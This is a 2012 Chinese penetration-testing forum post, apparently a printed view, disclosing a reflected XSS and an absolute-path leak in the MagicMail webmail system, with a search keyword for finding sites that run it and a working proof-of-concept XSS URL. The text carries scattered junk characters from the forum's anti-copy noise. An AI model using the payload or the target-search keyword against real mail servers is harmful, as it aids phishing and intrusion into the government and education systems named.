中国网络渗透测试联盟

标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞 [打印本页]

作者: admin    时间: 2012-11-9 20:38
标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞; V: s8 A* S( S) j/ R: o- E" e$ D3 Q8 g. l
0 |( n, l$ ]2 H& w  P

) V3 b; \$ f% J. z. c包含  一个反射性XSS  以及  绝对路径泄漏$ ?. i9 T0 u0 ?) N. _2 `; U
看了看 貌似全部是linux的。
/ B5 c. p+ Z9 {* W ) d% ?" y5 }0 P' U) n, a1 F
关键字:迈捷邮件系统 by MagicMail5 E9 r- y/ Q1 W9 n/ O

9 \) E  w$ {0 c, t1 Z- s4 Y' i可以看到很多政府网站都用这个邮件系统
& ^1 ~7 ]& Y" @' w8 y7 C/ W  q+ v8 r6 \, H! |9 H
绝对路径 http://madman.in/index.php?login_type=declare&language=; h6 C) E: N' J! b! [
, z* q/ L% S2 E( s+ z8 T
8 U9 K3 r4 a8 N' r
8 p: X4 \( Z$ K9 E8 Z
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E' Z- t- o$ x0 u" g) l

2 ~% h8 _& s/ X: W2 n3 _' g' p; ?4 ]
2 z0 {/ O( y+ Q( R8 C& ^
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等0 `5 ^( v. x. |! f2 B

$ Y+ ^8 v$ n3 w修复方案:看官方补丁吧。% j& c% h9 {; X" n! p





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2